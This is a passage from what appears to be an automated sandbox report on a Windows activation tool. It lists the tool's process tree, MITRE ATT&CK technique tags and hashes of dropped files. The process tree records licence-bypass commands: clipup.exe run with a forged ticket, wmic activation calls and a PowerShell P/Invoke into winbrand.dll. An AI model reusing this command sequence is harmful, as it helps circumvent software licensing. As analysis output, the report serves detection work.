        clipup -v -o
        5⤵
        
        PID:4200
      - C:\Windows\System32\clipup.exe
        
        clipup -v -o -ppl C:\Users\Admin\AppData\Local\Temp\temE275.tmp
        6⤵
        Checks SCSI registry key(s)
        
        PID:5088
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"
        5⤵
        
        PID:4376
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')
        6⤵
        
        PID:4904
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "Windows 10 Pro" "
        5⤵
        
        PID:3452
    - - C:\Windows\System32\find.exe
        
        find /i "Windows"
        5⤵
        
        PID:3444
    - - C:\Windows\System32\wbem\WMIC.exe
        
        wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey<>null" call Activate
        5⤵
        
        PID:3232
    - - C:\Windows\System32\cmd.exe
        
        cmd /c exit /b 0
        5⤵
        
        PID:4196
    - - C:\Windows\System32\wbem\WMIC.exe
        
        wmic path SoftwareLicensingProduct where (LicenseStatus='1' and GracePeriodRemaining='0' and PartialProductKey is not NULL) get Name /value
        5⤵
        
        PID:2140
    - - C:\Windows\System32\findstr.exe
        
        findstr /i "Windows"
        5⤵
        
        PID:1980
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "Set-WinHomeLocation -GeoId 244"
        5⤵
        
        PID:4716
    - - C:\Windows\System32\mode.com
        
        mode 76, 30
        5⤵
        
        PID:1348
    - - C:\Windows\System32\choice.exe
        
        choice /C:123456780 /N
        5⤵
        
        PID:4216
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\thank you triage.txt
  2⤵
  PID:4376
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Suspicious behavior: GetForegroundWindowSpam
  PID:2896

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3948

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3512

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4956

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2872

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:2704

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4372

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops file in System32 directory
PID:4812

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:4152

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1500

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
1⤵
PID:4332

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1328

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:4116

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4828

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s LicenseManager
1⤵
PID:1292

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs
1⤵
PID:4160

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
PID:164

C:\Windows\system32\Clipup.exe
"C:\Windows\system32\Clipup.exe" -o
1⤵
PID:4840
- C:\Windows\system32\Clipup.exe
  "C:\Windows\system32\Clipup.exe" -o -ppl C:\Windows\TEMP\temE16B.tmp
  2⤵
  - Checks SCSI registry key(s)
  PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -s PlugPlay
1⤵
PID:4428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\ClipSVC\GenuineTicket\GenuineTicket

Filesize
1KB

MD5
67a8abe602fd21c5683962fa75f8c9fd

SHA1
e296942da1d2b56452e05ae7f753cd176d488ea8

SHA256
1d19fed36f7d678ae2b2254a5eef240e6b6b9630e5696d0f9efb8b744c60e411

SHA512
70b0b27a2b89f5f771467ac24e92b6cc927f3fdc10d8cb381528b2e08f2a5a3e8c25183f20233b44b71b54ce910349c279013c6a404a1a95b3cc6b8922ab9fc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
50KB

MD5
2143b379fed61ab5450bab1a751798ce

SHA1
32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

SHA256
a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

SHA512
0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e89de4c332d18482fd9893b387d6bf85

SHA1
8d50a6797573d96b3a4635ec917ec197344b685c

SHA256
6c683595c4373e5844972d69e779508c1cee82a5331e13a681add436d81c006a

SHA512
783901e68fb295c8ebfc181dea65a0a13fddb0b3e495470306231f36f0e5fcf888cdf12a7a12af0e27107d9942b3691d6a852e80b5629f2d04c8e8ca2bd9789d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
746a7edccc7666404734b85d47efce68

SHA1
f4cf9d8e9bc48821cea284e1b906021be4487cfe

SHA256
35352abdb6c31287cf33e878bfdcbb15cb0d602c827fee91732353542f5e419b

SHA512
b400dd9371333af83b0d5d6d21c6f0016e02f23ed00d76922019421ffe2a19e8abf3fa10b818817f614e78bef7e4c412a2a9a893699e6f6b1fc96b090e2cdc86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f54bd191fff1f73cf68b2e8fe869d2dc

SHA1
9fcc36d052c04e7fbc1792533b7f45b37180e77a

SHA256
b58d5d868b7f746489434aa25e1931ad5fe24c19e194efec2e04ec8f627f5459

SHA512
501388ef38537a0bb5254d90ed19ca83e2965cd60ec7b9565788929aaef562bcf0302dd59e5979e25b4315be5840622784dbf05ef64e69965222f6ec42b53b87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c315d749c0de225ea94e9be49bea1b65

SHA1
63e6a8890b0222f3bb4b503a1dfe9ad5b39c76a9

SHA256
68f9ea781b655b3a93ef6ca501b9cf63f2dfdfefc981e6d5134a269c03353eb4

SHA512
fa9b05e0cd661aac7b306d8720fe670f4a6cd85c17f7b8197eac1390c4329b70f19f9f01d3dc8c265acfe82ca71708a0191cced4d92f292555725ee074c5ffd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4dc994601095192e1012e9ebddd5ac62

SHA1
358e53906f3eb2480747b1e8ef35db2b30822182

SHA256
05d380ce09a1f6dc0f3a33e7700a92aac55dc7d6ff21958b046ab728ea746a3c

SHA512
621915d1a5e7ec875d5dc3ae61605f3af32bd34024117fb4589cb654edea5c40cc11d28b312bc1cb251719bde9fccf5bb247bc25726d2f033a42e74e5977b92a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e4b85a7554365a57fca107fbcb90ab13

SHA1
96b8ab2427c9f9bacf21ec3323823e755be8402e

SHA256
438784b751869fb3cb95b143d2431f7147ad8bca7ba8d4ba57584f1b7cd5ae77

SHA512
77e6565f26a0a2593c6c3bb134370852f662d32608f3983b6aa257c88314063ed50b93ce9eee12148b89c7fbae5256e1f2512035fdea8bb2c97aa814a88df603

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.chk

Filesize
8KB

MD5
e2f5c07b4a0dfcea2600acfe5b74e04d

SHA1
53145f56eecffc7bf883038bc02ff43fc7728900

SHA256
10fdd94659b9e39e87b337b6282782a5565882b348ab5e15cf5f22e1b5cbdb18

SHA512
7158cf57550a9514a4e2c1110ece4ace1ce5820433a4ced6d5d61aa0143ec231282c361bab64309e5d945fbb478d8b4f3eef8e365aa3fda01663a377cc6b5211

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.log

Filesize
512KB

MD5
0c9f39689dbe042256de4f97a6177851

SHA1
b11d1de085777364f99bf853259620fd3959da71

SHA256
6bdb901b7217a7dc6a01993ac1a79313a96e3cdf42c2b4f1a35b6c5064ad8279

SHA512
2be788bd2d66da7aab385b18b27d7d9a9fd5777c05ab771cc90e1b7fd295ca6bba3a446a72c90753e195c28ca6111d14e5b7aea205f4bc46fb6b72f6521cbb4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\API-MS-Win-Core-Heap-Obsolete-L1-1-0.dll

Filesize
11KB

MD5
4b07a850da9cbedb5d4a172201c0474c

SHA1
ffd6213335b5085bc72b12a1e26c005cacec18c6

SHA256
dd03abf3ffde8a55c8a803cdd64344589b3f6bf8b38f73049c957a4bc734bb3f

SHA512
919fc3a0fe468cbe058933f74e29bf9094002989715321d1ef437853ce287bbc942471c65aae59fa6f02342aaae4e16f55acc57fcb7cc88b903455ed116e8f58

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\API-MS-Win-Core-Kernel32-Private-L1-1-0.dll

Filesize
11KB

MD5
ac4bb6a07b1774f36c7b35658970950f

SHA1
2733a1dcb45f7386caa9065a472e327563f0f6d3

SHA256
6f8079936682631244f1bb827d75f401c4620145284fb1e2296b06c8020b3dad

SHA512
ac38c5e457d6cea174f46d9a5d4757a04865976d2960d17ef19dec313c9b90fcb7db2cc22b531816934688b5a7bf86ef57749ed4650a09ed325f48eaf5cd2ea1

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\API-MS-Win-Core-Kernel32-Private-L1-1-1.dll

Filesize
10KB

MD5
2280220274965c6cf0b2063e118e77fe

SHA1
a3fb39c74fbec9ac3f7852544514b320c8cd7add

SHA256
09527d382d4c4b0bf4bc7956d448cf0b0b7e0256f9ffc692343a937cdd1e7990

SHA512
25071366f3d4d56e5bb7e5a91206b73de7ba6cd1494b1d97ede96a63b4776bde2b23ebee9f4837eadc820f0d27ec9949a7fb28edafcba7e2a531098931cb22f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\API-MS-Win-core-file-l2-1-0.dll

Filesize
11KB

MD5
94c80efa2029dcdc6bc1a3504ecc42be

SHA1
edb18cbd8166418b57e228e68277f5cd7862763a

SHA256
8cff0a47d0abcea953007bff2cacaff53030de7a34eb3caf8ed55a0ee7559863

SHA512
974e33cde77228755faf734e9c19febb8d74dec181ee1393c245ecc8bea5fa9dba659126830b57364ff562004516c089f8bfbd0259edaf6079daa98b255b0506

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\API-MS-Win-core-file-l2-1-1.dll

Filesize
10KB

MD5
d8bd036bb29c8fa2c1f2bd5b109b5074

SHA1
67b4d54d1a1f4c4b49cdf4d5ac7f6fdbd0df74ec

SHA256
8504e26cc213332a68c46f3b1cc36e9fe6679f17bd3327791863d23240206c2a

SHA512
599d0087f48ffa1b99b4a9f7619f75d1ceb4f6409a7e770e2e0eeb3a6578de9b42bd11d9e90c778215938a8b14a5b1de5285eee719f13f5fed7fe16d43196e36

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\API-MS-Win-core-localization-obsolete-l1-2-0.dll

Filesize
11KB

MD5
f8f1951748409365976589744290a483

SHA1
a72bfac536835c42baf7f4e1ba161f01612fc5ee

SHA256
ecb98b4cbe26562296d9e185c6cf3ed50c059f2741739685eb6f05ebee07c8d0

SHA512
8eed44017f9fafd221398aeb4b2c6183945b8d77c90896a4f83c9fee68fddff5c9e4c30c0db51dab121838547db47ebd6e8969657c7a36a680f3fb3de434134b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\CbsProvider.dll

Filesize
837KB

MD5
299b6b11642c3ad2b17181b35e9dadc3

SHA1
1b1dbccd60304ba0be631db3a190ec59ecc84746

SHA256
45eec38b42144bf80e46ad7356cff12849aa11af45e73174e2101132716d79bd

SHA512
2943af89e024c94808a2428ed5923dead1c44748742acf20b66ff52ba6ed8375c4b7938eb5f79ca42701df07a9b5ba73ae2b18b848adff3aecd5bd3a52b6261a

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\DismCorePS.dll

Filesize
160KB

MD5
4e43afafe9483d72a5838cdb8ea8d345

SHA1
779d8c234343da4ca7fbdb16b5861eecb025f6e3

SHA256
80e83929245c4377ecc73b7596ebf885d8e919b69ef975701a082d2b5cf2150e

SHA512
22267fe42128333940b9574fc5f5a70f0411280bd4e294bb456f987eb30c5ec1be12f4e5ce44e7007d793a3924032315782eaea96ab18da832ce56c1f0a3fe3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\DismHost.exe

Filesize
140KB

MD5
9ad8d8d2c6126cf9f65f4ba4cd24bcd9

SHA1
505e851852228545903c2423afa81039e0bd9447

SHA256
3687d79e43b9c3aa9ff31dbaafdd2f4674ce0937c7fe34813f43531f32e7aded

SHA512
e38d6af47c7443119fb73fcd6bcb23dd6b96bce19c4a98802af96fd6751e12a8add8c48cc0062ffe315aa7a5ffa6c38787c4f2051a8f6b97ac0dc86b3f8d279e

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\LogProvider.dll

Filesize
139KB

MD5
76dccc4bec94a870cb544ea0ac90d574

SHA1
0e500d42b98d340aadd3e886b0c4abefa8b92bc5

SHA256
53637290e64e395a0f07d7423096ccf341ccdf1dcb6e821f4e99d47197ea849e

SHA512
ef01adbf1dfb3856d5a84512556f38af291c0938c1267c8d627e1205385f7be56b0a7e2127f18818f987b53f0a3f910bc930d692be2a8429d03728d086e91a0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\OSProvider.dll

Filesize
126KB

MD5
bb0d5feee5b2f65b28f517d48180ce7b

SHA1
63a3eee12a18bceec86ca94226171ffe13bd2fe3

SHA256
f6c4fd17a47daf4a6d03fc92904d0f9a1e6c68aadf99c2d11202d4d73606dc16

SHA512
d1fc630db506ad7174da9565fd658dc415f95bf9c2c47c21fa8fe41b0dbff9a585244a0b7079dfb31697f14edbc1c021fccff60ffd53b447c910c70de117dc5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-base-util-l1-1-0.dll

Filesize
10KB

MD5
b8145fcbceb205515aa2ab68b67b6cd2

SHA1
0e360d6f478506895cb421c75507d92087a12ac8

SHA256
325f1ae552036a2d99b4bb72790e81b9b2189a9e11a10533536558852ce36de2

SHA512
ef062d3ae24f972f3c433d4c4eaeee6ff9bea5adfbcf8e5816e488f18845c296e4e784ec6d9a5e6803649e8baf29e9b67d9f98d597d072de9d4585219207311d

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-com-l1-1-0.dll

Filesize
15KB

MD5
b4000191a951302105f0a61efbda6272

SHA1
87b9ed3ac565b8f99ea52c08cfae81fce047261c

SHA256
b6b380bccd43c76d2acbf1a76d99f72c876cf7fe584c29da30f7fe0af7f99ce2

SHA512
3d4bf2821f3d79a37308894a470c68ced8fb9d307c3d5928be7740e5ba8591b3565880475a7f7bfc74c107e647a8a450dcabc99c5b9a763b666006c74b83a8a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-comm-l1-1-0.dll

Filesize
11KB

MD5
22a0fc9eb4ebb04fd291dadbaeb01863

SHA1
4d932352d0e04163298bebcfd2fe829ee0667d33

SHA256
bdf2c64799df36b9588ef4ebc415ea1d717fb771513014d453aa0422988cdde8

SHA512
122bc8991b7d56c070ae0c987a9598773cf167d3d6aa257433e724e3d10d353466ea9ee44cfd125519a410703b65da9580510ad17e44d2f8169d8769c6f5eaf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-console-l1-1-0.dll

Filesize
11KB

MD5
a162477325242991af4fbd468a8a6d09

SHA1
2af1413160ca44f161bd10229a283a77b224cad2

SHA256
93982881de73c66d048fb440b782fa07ef03ff97bcb63364d861631cb20fb67b

SHA512
d11df4fe18c71fe6767617412272a87592bec5e0604cf34cc17e3698ccc196c0bcab71789c06f538cfa87d5d5c02fd76a38d53464da4dbc5220587aeac2440b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-datetime-l1-1-0.dll

Filesize
11KB

MD5
2cb1786277eb98350fab3362d76a3f4b

SHA1
59f5feb7021c17f5c1472bbda4b6e83a0261c678

SHA256
62e113e41ec298207a9320e231ea0e0b046dd938f8f1c4bb53a0f4662df9cec2

SHA512
3495ecb47bec7879597a1ac7bed58c88848046b771b27f5fec5749d84acea54779f4df1208cc4450acdc77cfce40f2fdd62a1dabda4cccb54597e66123121b4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-datetime-l1-1-1.dll

Filesize
10KB

MD5
9c4f4e8d5e03807ba68ca9ac8983dc38

SHA1
54301ad7b74d54355ff192481e89e68051757eeb

SHA256
76f2e1544670c98de09494d5ee0dda1a8bf18fd50a4e002af0fcb7f96044e634

SHA512
bc7ea5bb1f1f18569dfbe16f84cc33023dd780bebda1135466486df8736b4939b434d408d57d41ed1cb513bf32c92841d5f1f5cb919f623e0a0bd635c3e33eec

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-debug-l1-1-0.dll

Filesize
11KB

MD5
e253885dbae8902784a506b3b40cbe29

SHA1
f9bd90befcab0e7fcc5a39438cc79c227458f066

SHA256
e3e50ee0bb419a184a3657eefb88586c85811b59fb3e26ffc3d3d6e1c6fe9888

SHA512
8ef55aa95685d94a70ede97d8bde0d86e479e8e674f7ea2cf6f46c7b6b29bca791ecf3f131797ad118df4ceabf75a6d7d045a7d5a394c76699974364e084fc23

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-debug-l1-1-1.dll

Filesize
11KB

MD5
2d957d915f70e6c3c3be0ba2171a346f

SHA1
28f6cef9b1298a6d09cc68bb61f5651938b56fd1

SHA256
5e660d972e0713acbfd03d27e1f49cd1250192f81d3c441734ebc427cc83b7f4

SHA512
72ee688b0239fbe919642959e4722bddf3a3a18719cbe7725a14de75759a3caa2f72e29f8b79aff0145267e73a11298a0e51cb5b6fd721855028bcb28bd2de81

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-delayload-l1-1-0.dll

Filesize
10KB

MD5
d030eef92ce21da51982b638a20298e2

SHA1
2aa7f0543ec3ec810f54f52c7892d65ddd99ffd2

SHA256
5c079c35b6a159be9782f9d7afefa66715e3ffb3d118d684e07cc1c40efc3fe5

SHA512
cd65c19f9b74a72e91ec029722b18e6866af6f1b3a9a875080acb52f277cfdcdb2c39bcff215e16166797a15f0e58499055fdc19894d76199cb5a558cef94f05

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
11KB

MD5
5b9477310b7bcb3d6d89530ee43dadef

SHA1
4b34d76eb2e0c92fd7f9159880103dbeb16e8890

SHA256
0c80fb25181730c8e8ba969711e62063cac7a0adeb0105aa30ebaa60069d43f4

SHA512
3b27f0e55d656cfd14bd0d99950e53fc9bbfc3b099b962326fd3bba80789c70c2007cead96cadc75c2d09b550cd994724a221f9549a790974d2aaa29e29ea12c

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-errorhandling-l1-1-1.dll

Filesize
11KB

MD5
f78e90c2c006848d03449d07b9ca1394

SHA1
615da7aa0f8df9290aa91246e31a2e57eaf94609

SHA256
0265ed365a82106c6b52f8302b3ae12eba190ed15e0583d7effe8069dc8043a3

SHA512
adf71a91e899ed7643acc09f24f3bba48eec1f9a0d17c569c93e4359b85843bc0eb944a3bd0c4b2e95556b91d02ffd55d7e1edaf3653ca17c51cd0011e55081b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-fibers-l1-1-0.dll

Filesize
10KB

MD5
35b1084f10c9cc8c0d77c631481975e1

SHA1
3a9d92a0068eb6c1a502551bea38aa020aa67118

SHA256
4f1b8fadb782036e248aee66ed1df824ced7d283aa8185852e9cf984a2679fc1

SHA512
d19f3daf7d05a9a96cda30778adfaa9511d5aaeef950ea64c1ca480d6c915b04907930470e00e8d55ce003f26ee9457cc8c848facb4798b98b8e6fbcb7d3747a

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-fibers-l1-1-1.dll

Filesize
10KB

MD5
47928bc8607adb34157ef396a74b87fe

SHA1
f0b569f2f616a5a54805448eb10492ca625e1ef1

SHA256
316121a1402c7582fcc54154cd5799fcf2e13df9a58d21f9713d6cb60a8734e4

SHA512
32e05f911ffed0c7ef1af2b877683da99fe588c11fcb3626ff356e70dc78095adc761a96d294470e60f2d34e123541f5311f813904c66f261a8bf2b564f80d24

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-file-l1-1-0.dll

Filesize
14KB

MD5
b2d93938b34fbf59ada9dd5344f71c20

SHA1
e1d70be43a7857fcfc5de39037d0dd67d34842d0

SHA256
92c1ad8edd36e04a587452e37773bf40acc7be35e110e43fa9d11e198eb8082f

SHA512
d48a2dbc32def408de7deee7fbba9d532f495dd013d64469418d64423be2037dade444796eb26f5676c535b27c678c39ff86fd9f1305e4a8cebdd51d16384869

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-file-l1-2-0.dll

Filesize
11KB

MD5
fdcf01518857c9f531f325cdc280e998

SHA1
dcf6fb0df43a41b963aa9e026620081723ad00e8

SHA256
ceec82007183792bf7cd31d5d2d0047a2a91a1cc987e61ad888caf05c29a5a83

SHA512
c3ffed97e2a794bd1fad116adbfea9c94575685ee12778c18cfcb012799df212338cf88f833d7b75fa6b939eb19da47483f7a071b30e83c5f9d960900303416c

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-file-l1-2-1.dll

Filesize
11KB

MD5
2b8a00f41c6fd4e535f605b0398658b3

SHA1
23fb4183e6f0a23197137c978e9f3e0bb30c17a9

SHA256
ea4bb38ea3f0eb6fd9a2b56a2b145de40b954db8e007913f4084717b0940b043

SHA512
3b75a90653b6ed10455174e928cdd941a186e988c3a6273e19bd3bed9ad290b50fb7961e128f0276e7b880de3a953df3934fb14bda86aa42828bb9b76323e091

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-handle-l1-1-0.dll

Filesize
11KB

MD5
38787d38ffcce319daa5888462b1b012

SHA1
fbe8ef772ab176a843ec39bcb6bc98291ced784a

SHA256
8e6a116757e589e067296831a65621a3fd8f4cb7c8b78e4fa8f45158001cb9a3

SHA512
5f5539fa4c1fd335cfdb493007cb65ee7818eec6f3e97da644c9ed6322125f83e54a7d7a9d57b54d4f87cc437b557198b743bb3543da4160e3bd64c195b646b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-heap-l1-1-0.dll

Filesize
11KB

MD5
56e263cbf158e7da598bc7b5c4b2e3e8

SHA1
99b5569905f341b2f3b356138da4878b9cb1da7c

SHA256
bbd2e5017be5efd63cbb5613822a44c09fbda60ae4e5fb9688ee0e36d2c2d5f3

SHA512
d61f0d85406c82e949d73d798d799156fb076659a74a2526ecf2362ca620413445bc4e0cb11bfd54d78aebd34994a94b1c96b433cc85c3f2f6b7fcf374aea58a

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
11KB

MD5
48d8a3bd4080743ff20bd931b326b9ff

SHA1
eb99b166057a698d7b27fbdad796b911f672b055

SHA256
cd9d4b07efc67b783a5c7704e90608a228d8acf7c11b38251f8b09b39ad96c20

SHA512
ffedacd20aef352d1c215150edb4c1de8310317bfc53b1a77bc19603571f978339ba02d60855d9e4acbc8ed41fa9d5e8df9cf586f3aa00cb9f23146e99865133

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-io-l1-1-0.dll

Filesize
11KB

MD5
b3a00ea6ad4e3362798d12da0d2ef711

SHA1
c171a25536c2c9e8cadb549fea705369152c9c56

SHA256
cd85c48d73a4d2ef6e7d25e69050ae3c5f12ad10d2264a3f30e2be52c8137f0f

SHA512
078be76aee9fe0767fe8afb6337b5068d122688524fbc833a985de87285cbddae176ff8f44b48bd8a7d9148e5c2c085baef3aeea3b3222836547858d38116702

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-io-l1-1-1.dll

Filesize
10KB

MD5
090db88a045d0bcff001ce3671f56097

SHA1
1f394c2726b3b68c49dfb180267cc28c60b0fd7b

SHA256
3727f043e8fdeef4cc21aff12928228ac95de1d6290e14c6aac13cb7be31aedd

SHA512
